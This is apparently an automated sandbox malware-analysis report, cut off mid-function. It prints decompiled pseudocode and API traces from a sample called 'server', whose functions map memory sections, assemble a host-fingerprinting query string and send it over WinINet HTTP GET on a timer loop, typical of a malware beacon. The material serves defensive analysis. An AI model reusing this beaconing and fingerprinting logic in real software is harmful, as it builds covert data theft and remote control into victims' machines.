                      • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                      • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E00401459(void** __esi, PVOID* _a4) {
                      				long _v8;
                      				void* _v12;
                      				void* _v16;
                      				long _t13;
                      
                      				_v16 = 0;
                      				asm("stosd");
                      				_v8 = 0;
                      				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                      				if(_t13 < 0) {
                      					_push(_t13);
                      					return __esi[6]();
                      				}
                      				return 0;
                      			}

                      APIs
                      • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                      Memory Dump Source
                      • Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_server.jbxd
                      Similarity
                      • API ID: SectionView
                      • String ID:
                      • API String ID: 1323581903-0
                      • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                      • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                      • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                      • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 69%
                      			E02BD3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
                      				intOrPtr _v4;
                      				intOrPtr _v8;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				void* _v48;
                      				intOrPtr _v56;
                      				void* __edi;
                      				intOrPtr _t30;
                      				void* _t31;
                      				intOrPtr _t33;
                      				intOrPtr _t34;
                      				intOrPtr _t35;
                      				intOrPtr _t36;
                      				intOrPtr _t37;
                      				void* _t40;
                      				intOrPtr _t41;
                      				int _t44;
                      				intOrPtr _t45;
                      				int _t48;
                      				void* _t49;
                      				intOrPtr _t53;
                      				intOrPtr _t59;
                      				intOrPtr _t63;
                      				intOrPtr* _t65;
                      				void* _t66;
                      				intOrPtr _t71;
                      				intOrPtr _t77;
                      				intOrPtr _t80;
                      				intOrPtr _t83;
                      				int _t86;
                      				intOrPtr _t88;
                      				int _t91;
                      				intOrPtr _t93;
                      				int _t96;
                      				void* _t98;
                      				void* _t99;
                      				void* _t103;
                      				void* _t105;
                      				void* _t106;
                      				intOrPtr _t107;
                      				long _t109;
                      				intOrPtr* _t110;
                      				intOrPtr* _t111;
                      				long _t112;
                      				int _t113;
                      				void* _t114;
                      				void* _t115;
                      				void* _t116;
                      				void* _t119;
                      				void* _t120;
                      				void* _t122;
                      				void* _t123;
                      
                      				_t103 = __edx;
                      				_t99 = __ecx;
                      				_t120 =  &_v16;
                      				_t112 = __eax;
                      				_t30 =  *0x2bda3e0; // 0x35b9c48
                      				_v4 = _t30;
                      				_v8 = 8;
                      				_t31 = RtlAllocateHeap( *0x2bda2d8, 0, 0x800); // executed
                      				_t98 = _t31;
                      				if(_t98 != 0) {
                      					if(_t112 == 0) {
                      						_t112 = GetTickCount();
                      					}
                      					_t33 =  *0x2bda018; // 0x3dd6b064
                      					asm("bswap eax");
                      					_t34 =  *0x2bda014; // 0x3a87c8cd
                      					asm("bswap eax");
                      					_t35 =  *0x2bda010; // 0xd8d2f808
                      					asm("bswap eax");
                      					_t36 =  *0x2bda00c; // 0x81762942
                      					asm("bswap eax");
                      					_t37 =  *0x2bda348; // 0x9dd5a8
                      					_t3 = _t37 + 0x2bdb5ac; // 0x74666f73
                      					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x2bda02c,  *0x2bda004, _t112);
                      					_t40 = E02BD467F();
                      					_t41 =  *0x2bda348; // 0x9dd5a8
                      					_t4 = _t41 + 0x2bdb575; // 0x74707526
                      					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
                      					_t122 = _t120 + 0x38;
                      					_t114 = _t113 + _t44;
                      					if(_a12 != 0) {
                      						_t93 =  *0x2bda348; // 0x9dd5a8
                      						_t8 = _t93 + 0x2bdb508; // 0x732526
                      						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
                      						_t122 = _t122 + 0xc;
                      						_t114 = _t114 + _t96;
                      					}
                      					_t45 =  *0x2bda348; // 0x9dd5a8
                      					_t10 = _t45 + 0x2bdb246; // 0x74636126
                      					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
                      					_t123 = _t122 + 0xc;
                      					_t115 = _t114 + _t48; // executed
                      					_t49 = E02BD472F(_t99); // executed
                      					_t105 = _t49;
                      					if(_t105 != 0) {
                      						_t88 =  *0x2bda348; // 0x9dd5a8
                      						_t12 = _t88 + 0x2bdb8d0; // 0x736e6426
                      						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
                      						_t123 = _t123 + 0xc;
                      						_t115 = _t115 + _t91;
                      						HeapFree( *0x2bda2d8, 0, _t105);
                      					}
                      					_t106 = E02BD1340();
                      					if(_t106 != 0) {
                      						_t83 =  *0x2bda348; // 0x9dd5a8
                      						_t14 = _t83 + 0x2bdb8c5; // 0x6f687726
                      						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
                      						_t123 = _t123 + 0xc;
                      						_t115 = _t115 + _t86;
                      						HeapFree( *0x2bda2d8, 0, _t106);
                      					}
                      					_t107 =  *0x2bda3cc; // 0x35b9600
                      					_a20 = E02BD6B59(0x2bda00a, _t107 + 4);
                      					_t53 =  *0x2bda36c; // 0x35b95b0
                      					_t109 = 0;
                      					if(_t53 != 0) {
                      						_t80 =  *0x2bda348; // 0x9dd5a8
                      						_t17 = _t80 + 0x2bdb8be; // 0x3d736f26
                      						wsprintfA(_t115 + _t98, _t17, _t53);
                      					}
                      					if(_a20 != _t109) {
                      						_t116 = RtlAllocateHeap( *0x2bda2d8, _t109, 0x800);
                      						if(_t116 != _t109) {
                      							E02BD2915(GetTickCount());
                      							_t59 =  *0x2bda3cc; // 0x35b9600
                      							__imp__(_t59 + 0x40);
                      							asm("lock xadd [eax], ecx");
                      							_t63 =  *0x2bda3cc; // 0x35b9600
                      							__imp__(_t63 + 0x40);
                      							_t65 =  *0x2bda3cc; // 0x35b9600
                      							_t66 = E02BD6675(1, _t103, _t98,  *_t65); // executed
                      							_t119 = _t66;
                      							asm("lock xadd [eax], ecx");
                      							if(_t119 != _t109) {
                      								StrTrimA(_t119, 0x2bd9280);
                      								_push(_t119);
                      								_t71 = E02BD7563();
                      								_v20 = _t71;
                      								if(_t71 != _t109) {
                      									_t110 = __imp__;
                      									 *_t110(_t119, _v8);
                      									 *_t110(_t116, _v8);
                      									_t111 = __imp__;
                      									 *_t111(_t116, _v32);
                      									 *_t111(_t116, _t119);
                      									_t77 = E02BD21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
                      									_v56 = _t77;
                      									if(_t77 != 0 && _t77 != 0x10d2) {
                      										E02BD63F6();
                      									}
                      									HeapFree( *0x2bda2d8, 0, _v48);
                      									_t109 = 0;
                      								}
                      								HeapFree( *0x2bda2d8, _t109, _t119);
                      							}
                      							RtlFreeHeap( *0x2bda2d8, _t109, _t116); // executed
                      						}
                      						HeapFree( *0x2bda2d8, _t109, _a12);
                      					}
                      					RtlFreeHeap( *0x2bda2d8, _t109, _t98); // executed
                      				}
                      				return _v16;
                      			}

                      APIs
                      • RtlAllocateHeap.NTDLL ref: 02BD3D08
                      • GetTickCount.KERNEL32 ref: 02BD3D1C
                      • wsprintfA.USER32 ref: 02BD3D6B
                      • wsprintfA.USER32 ref: 02BD3D88
                      • wsprintfA.USER32 ref: 02BD3DA9
                      • wsprintfA.USER32 ref: 02BD3DC1
                      • wsprintfA.USER32 ref: 02BD3DE4
                      • HeapFree.KERNEL32(00000000,00000000), ref: 02BD3DF4
                      • wsprintfA.USER32 ref: 02BD3E16
                      • HeapFree.KERNEL32(00000000,00000000), ref: 02BD3E26
                      • wsprintfA.USER32 ref: 02BD3E5E
                      • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD3E79
                      • GetTickCount.KERNEL32 ref: 02BD3E89
                      • RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD3E9D
                      • RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD3EBB
                        • Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A0
                        • Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A8
                        • Part of subcall function 02BD6675: strcpy.NTDLL ref: 02BD66BF
                        • Part of subcall function 02BD6675: lstrcat.KERNEL32(00000000,00000000), ref: 02BD66CA
                        • Part of subcall function 02BD6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66E7
                      • StrTrimA.SHLWAPI(00000000,02BD9280,00000000,035B9600), ref: 02BD3EED
                        • Part of subcall function 02BD7563: lstrlen.KERNEL32(035B9C38,00000000,00000000,00000000,02BD3EF9,00000000), ref: 02BD7573
                        • Part of subcall function 02BD7563: lstrlen.KERNEL32(?), ref: 02BD757B
                        • Part of subcall function 02BD7563: lstrcpy.KERNEL32(00000000,035B9C38), ref: 02BD758F
                        • Part of subcall function 02BD7563: lstrcat.KERNEL32(00000000,?), ref: 02BD759A
                      • lstrcpy.KERNEL32(00000000,?), ref: 02BD3F0C
                      • lstrcpy.KERNEL32(00000000,?), ref: 02BD3F13
                      • lstrcat.KERNEL32(00000000,?), ref: 02BD3F20
                      • lstrcat.KERNEL32(00000000,00000000), ref: 02BD3F24
                        • Part of subcall function 02BD21A6: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02BD2258
                      • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02BD3F54
                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD3F64
                      • RtlFreeHeap.NTDLL(00000000,00000000,00000000,035B9600), ref: 02BD3F72
                      • HeapFree.KERNEL32(00000000,?), ref: 02BD3F83
                      • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02BD3F91
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                      • String ID: Uqt
                      • API String ID: 186568778-2320327147
                      • Opcode ID: 9caf7c2dec365afb019fc24e57fcfa974ba71ccad5196be0dd828220a358236a
                      • Instruction ID: 6618f52536c9fdf171490afb6bb91d4056f1267d490413274b1583e9d858df8d
                      • Opcode Fuzzy Hash: 9caf7c2dec365afb019fc24e57fcfa974ba71ccad5196be0dd828220a358236a
                      • Instruction Fuzzy Hash: BC712331842204AFC711AB68EC58EDB3BFDEB88794B060964F949D3211F732E924DF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 92%
                      			E02BD7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
                      				void _v8;
                      				long _v12;
                      				void _v16;
                      				void* _t34;
                      				void* _t38;
                      				void* _t40;
                      				char* _t56;
                      				long _t57;
                      				void* _t58;
                      				intOrPtr _t59;
                      				long _t65;
                      
                      				_t65 = __esi;
                      				_t58 = __ecx;
                      				_v16 = 0xea60;
                      				__imp__( *(__esi + 4));
                      				_v12 = __eax + __eax;
                      				_t56 = E02BD33DC(__eax + __eax + 1);
                      				if(_t56 != 0) {
                      					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
                      						E02BD61DA(_t56);
                      					} else {
                      						E02BD61DA( *(__esi + 4));
                      						 *(__esi + 4) = _t56;
                      					}
                      				}
                      				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
                      				 *(_t65 + 0x10) = _t34;
                      				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02BD7B18) == 0xffffffff) {
                      					L15:
                      					return GetLastError();
                      				} else {
                      					ResetEvent( *(_t65 + 0x1c));
                      					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
                      					 *(_t65 + 0x14) = _t38;
                      					if(_t38 != 0 || GetLastError() == 0x3e5 && E02BD16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
                      						_t59 =  *0x2bda348; // 0x9dd5a8
                      						_t15 = _t59 + 0x2bdb845; // 0x544547
                      						_v8 = 0x84404000;
                      						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
                      						 *(_t65 + 0x18) = _t40;
                      						if(_t40 == 0) {
                      							goto L15;
                      						}
                      						_t57 = 4;
                      						_v12 = _t57;
                      						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
                      							_v8 = _v8 | 0x00000100;
                      							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
                      						}
                      						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
                      							goto L15;
                      						} else {
                      							return 0;
                      						}
                      					} else {
                      						goto L15;
                      					}
                      				}
                      			}

                      Line addresses: 0x02bd7b83, 0x02bd7b83, 0x02bd7b8e, 0x02bd7b95, 0x02bd7b9d, 0x02bd7ba7, 0x02bd7bad, 0x02bd7bc0, 0x02bd7bd0, 0x02bd7bc2, 0x02bd7bc5, 0x02bd7bca, 0x02bd7bca, 0x02bd7bc0, 0x02bd7be0, 0x02bd7be6, 0x02bd7beb, 0x02bd7cd4, 0x00000000, 0x02bd7c06, 0x02bd7c09, 0x02bd7c1c, 0x02bd7c22, 0x02bd7c27, 0x02bd7c4f, 0x02bd7c62, 0x02bd7c6c, 0x02bd7c6f, 0x02bd7c75, 0x02bd7c7a, 0x00000000, 0x00000000, 0x02bd7c7e, 0x02bd7c8a, 0x02bd7c9b, 0x02bd7c9d, 0x02bd7cae, 0x02bd7cae, 0x02bd7cbe, 0x00000000, 0x02bd7cd0, 0x00000000, 0x02bd7cd0, 0x00000000, 0x00000000, 0x00000000, 0x02bd7c27

                      APIs
                      • lstrlen.KERNEL32(?,00000008,74714D40), ref: 02BD7B95
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02BD7BB8
                      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02BD7BE0
                      • InternetSetStatusCallback.WININET(00000000,02BD7B18), ref: 02BD7BF7
                      • ResetEvent.KERNEL32(?), ref: 02BD7C09
                      • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02BD7C1C
                      • GetLastError.KERNEL32 ref: 02BD7C29
                      • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02BD7C6F
                      • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02BD7C8D
                      • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02BD7CAE
                      • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02BD7CBA
                      • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02BD7CCA
                      • GetLastError.KERNEL32 ref: 02BD7CD4
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                      • String ID: @MqtNqt
                      • API String ID: 2290446683-2883916605
                      • Opcode ID: 6fe75e801c0a638f80a9d4615fd03db345e41f138a9fe0acea31102ece9aee8e
                      • Instruction ID: 8b9a6ca72c0855b079156797f83c2aefb77b9a52efc1329e2130ad4315224d6c
                      • Opcode Fuzzy Hash: 6fe75e801c0a638f80a9d4615fd03db345e41f138a9fe0acea31102ece9aee8e
                      • Instruction Fuzzy Hash: 4C41AC71900604BFEB319FA5DC48EDBBBBDEB85744B144DA8F606E2090FB70A654DB20
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      (graph rendering omitted; basic blocks 2bd6815-2bd69dc; API calls in graph: memset, CreateWaitableTimerA, _allmul, SetWaitableTimer, WaitForMultipleObjects, CloseHandle)
                      C-Code - Quality: 83%
                      			E02BD6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                      				void _v48;
                      				long _v52;
                      				struct %anon52 _v60;
                      				char _v72;
                      				long _v76;
                      				void* _v80;
                      				union _LARGE_INTEGER _v84;
                      				struct %anon52 _v92;
                      				void* _v96;
                      				void* _v100;
                      				union _LARGE_INTEGER _v104;
                      				long _v108;
                      				struct %anon52 _v124;
                      				long _v128;
                      				struct %anon52 _t46;
                      				void* _t51;
                      				long _t53;
                      				void* _t54;
                      				struct %anon52 _t61;
                      				long _t65;
                      				struct %anon52 _t66;
                      				void* _t69;
                      				void* _t73;
                      				signed int _t74;
                      				void* _t76;
                      				void* _t78;
                      				void** _t82;
                      				signed int _t86;
                      				void* _t89;
                      
                      				_t76 = __edx;
                      				_v52 = 0;
                      				memset( &_v48, 0, 0x2c);
                      				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                      				_t46 = CreateWaitableTimerA(0, 1, 0);
                      				_v60 = _t46;
                      				if(_t46 == 0) {
                      					_v92.HighPart = GetLastError();
                      				} else {
                      					_push(0xffffffff);
                      					_push(0xff676980);
                      					_push(0);
                      					_push( *0x2bda2e0);
                      					_v76 = 0;
                      					_v80 = 0;
                      					L02BD82DA();
                      					_v84.LowPart = _t46;
                      					_v80 = _t76;
                      					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                      					_t51 =  *0x2bda30c; // 0x308
                      					_v76 = _t51;
                      					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                      					_v108 = _t53;
                      					if(_t53 == 0) {
                      						if(_a8 != 0) {
                      							L4:
                      							 *0x2bda2ec = 5;
                      						} else {
                      							_t69 = E02BD5251(_t76); // executed
                      							if(_t69 != 0) {
                      								goto L4;
                      							}
                      						}
                      						_v104.LowPart = 0;
                      						L6:
                      						L6:
                      						if(_v104.LowPart == 1 && ( *0x2bda300 & 0x00000001) == 0) {
                      							_v104.LowPart = 2;
                      						}
                      						_t74 = _v104.LowPart;
                      						_t58 = _t74 << 4;
                      						_t78 = _t89 + (_t74 << 4) + 0x38;
                      						_t75 = _t74 + 1;
                      						_v92.LowPart = _t74 + 1;
                      						_t61 = E02BD35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                      						_v124 = _t61;
                      						if(_t61 != 0) {
                      							goto L17;
                      						}
                      						_t66 = _v92;
                      						_v104.LowPart = _t66;
                      						if(_t66 != 3) {
                      							goto L6;
                      						} else {
                      							_v124.HighPart = E02BD69E6(_t75,  &_v72, _a4, _a8);
                      						}
                      						goto L12;
                      						L17:
                      						__eflags = _t61 - 0x10d2;
                      						if(_t61 != 0x10d2) {
                      							_push(0xffffffff);
                      							_push(0xff676980);
                      							_push(0);
                      							_push( *0x2bda2e4);
                      							goto L21;
                      						} else {
                      							__eflags =  *0x2bda2e8; // 0x0
                      							if(__eflags == 0) {
                      								goto L12;
                      							} else {
                      								_t61 = E02BD63F6();
                      								_push(0xffffffff);
                      								_push(0xdc3cba00);
                      								_push(0);
                      								_push( *0x2bda2e8);
                      								L21:
                      								L02BD82DA();
                      								_v104.LowPart = _t61;
                      								_v100 = _t78;
                      								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                      								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                      								_v128 = _t65;
                      								__eflags = _t65;
                      								if(_t65 == 0) {
                      									goto L6;
                      								} else {
                      									goto L12;
                      								}
                      							}
                      						}
                      						L25:
                      					}
                      					L12:
                      					_t82 =  &_v72;
                      					_t73 = 3;
                      					do {
                      						_t54 =  *_t82;
                      						if(_t54 != 0) {
                      							HeapFree( *0x2bda2d8, 0, _t54);
                      						}
                      						_t82 =  &(_t82[4]);
                      						_t73 = _t73 - 1;
                      					} while (_t73 != 0);
                      					CloseHandle(_v80);
                      				}
                      				return _v92.HighPart;
                      				goto L25;
                      			}

                      Line addresses: 0x02bd6815, 0x02bd682b, 0x02bd682f, 0x02bd6834, 0x02bd683b, 0x02bd6841, 0x02bd6847, 0x02bd69ce, 0x02bd684d, 0x02bd684d, 0x02bd684f, 0x02bd6854, 0x02bd6855, 0x02bd685b, 0x02bd685f, 0x02bd6863, 0x02bd6871, 0x02bd687f, 0x02bd6883, 0x02bd6885, 0x02bd6892, 0x02bd689e, 0x02bd68a0, 0x02bd68a6, 0x02bd68af, 0x02bd68ba, 0x02bd68ba, 0x02bd68b1, 0x02bd68b1, 0x02bd68b8, 0x00000000, 0x00000000, 0x02bd68b8, 0x02bd68c4, 0x00000000, 0x02bd68c8, 0x02bd68cd, 0x02bd68d8, 0x02bd68d8, 0x02bd68e0, 0x02bd68e6, 0x02bd68ee, 0x02bd68f7, 0x02bd68fe, 0x02bd6902, 0x02bd6907, 0x02bd690d, 0x00000000, 0x00000000, 0x02bd690f, 0x02bd6913, 0x02bd691a, 0x00000000, 0x02bd691c, 0x02bd692c, 0x02bd692c, 0x00000000, 0x02bd695d, 0x02bd695d, 0x02bd6962, 0x02bd6981, 0x02bd6983, 0x02bd6988, 0x02bd6989, 0x00000000, 0x02bd6964, 0x02bd6964, 0x02bd696a, 0x00000000, 0x02bd696c, 0x02bd696c, 0x02bd6971, 0x02bd6973, 0x02bd6978, 0x02bd6979, 0x02bd698f, 0x02bd698f, 0x02bd6997, 0x02bd69a5, 0x02bd69a9, 0x02bd69b5, 0x02bd69b7, 0x02bd69bb, 0x02bd69bd, 0x00000000, 0x02bd69c3, 0x00000000, 0x02bd69c3, 0x02bd69bd, 0x02bd696a, 0x00000000, 0x02bd6962, 0x02bd6930, 0x02bd6932, 0x02bd6936, 0x02bd6937, 0x02bd6937, 0x02bd693b, 0x02bd6945, 0x02bd6945, 0x02bd694b, 0x02bd694e, 0x02bd694e, 0x02bd6955, 0x02bd6955, 0x02bd69dc, 0x00000000

                      APIs
                      • memset.NTDLL ref: 02BD682F
                      • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BD683B
                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BD6863
                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02BD6883
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02BD26E9,?), ref: 02BD689E
                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02BD26E9,?,00000000), ref: 02BD6945
                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02BD26E9,?,00000000,?,?), ref: 02BD6955
                      • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BD698F
                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 02BD69A9
                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02BD69B5
                        • Part of subcall function 02BD5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,035B9218,00000000,?,7476F710,00000000,7476F730), ref: 02BD52A0
                        • Part of subcall function 02BD5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,035B9160,?,00000000,30314549,00000014,004F0053,035B9270), ref: 02BD533D
                        • Part of subcall function 02BD5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02BD68B6), ref: 02BD534F
                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02BD26E9,?,00000000,?,?), ref: 02BD69C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                      • String ID: Uqt$@MqtNqt
                      • API String ID: 3521023985-3266969629
                      • Opcode ID: ee0440dfe56f5fd976e45d12c63dcf0745f93e3e33dd9b4b03497282bedea237
                      • Instruction ID: f308ec4990041714a6223cf679455c650ab0e3d07540649658dc7c9dc1b0773b
                      • Opcode Fuzzy Hash: ee0440dfe56f5fd976e45d12c63dcf0745f93e3e33dd9b4b03497282bedea237
                      • Instruction Fuzzy Hash: BD519C71449320AFC710AF15EC44EEBBBECEB88364F508A1AF9A9D2190E731D554CF92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      (graph rendering omitted; basic blocks 2bd7fc5-2bd81ff; API calls in graph: RaiseException, LoadLibraryA, InterlockedExchange, FreeLibrary, LocalAlloc, GetProcAddress)
                      C-Code - Quality: 51%
                      			E02BD7FC5(long _a4, long _a8) {
                      				signed int _v8;
                      				intOrPtr _v16;
                      				LONG* _v28;
                      				long _v40;
                      				long _v44;
                      				long _v48;
                      				CHAR* _v52;
                      				long _v56;
                      				CHAR* _v60;
                      				long _v64;
                      				signed int* _v68;
                      				char _v72;
                      				signed int _t76;
                      				signed int _t80;
                      				signed int _t81;
                      				intOrPtr* _t82;
                      				intOrPtr* _t83;
                      				intOrPtr* _t85;
                      				intOrPtr* _t90;
                      				intOrPtr* _t95;
                      				intOrPtr* _t98;
                      				struct HINSTANCE__* _t99;
                      				void* _t102;
                      				intOrPtr* _t104;
                      				void* _t115;
                      				long _t116;
                      				void _t125;
                      				void* _t131;
                      				signed short _t133;
                      				struct HINSTANCE__* _t138;
                      				signed int* _t139;
                      
                      				_t139 = _a4;
                      				_v28 = _t139[2] + 0x2bd0000;
                      				_t115 = _t139[3] + 0x2bd0000;
                      				_t131 = _t139[4] + 0x2bd0000;
                      				_v8 = _t139[7];
                      				_v60 = _t139[1] + 0x2bd0000;
                      				_v16 = _t139[5] + 0x2bd0000;
                      				_v64 = _a8;
                      				_v72 = 0x24;
                      				_v68 = _t139;
                      				_v56 = 0;
                      				asm("stosd");
                      				_v48 = 0;
                      				_v44 = 0;
                      				_v40 = 0;
                      				if(( *_t139 & 0x00000001) == 0) {
                      					_a8 =  &_v72;
                      					RaiseException(0xc06d0057, 0, 1,  &_a8);
                      					return 0;
                      				}
                      				_t138 =  *_v28;
                      				_t76 = _a8 - _t115 >> 2 << 2;
                      				_t133 =  *(_t131 + _t76);
                      				_a4 = _t76;
                      				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                      				_v56 = _t80;
                      				_t81 = _t133 + 0x2bd0002;
                      				if(_t80 == 0) {
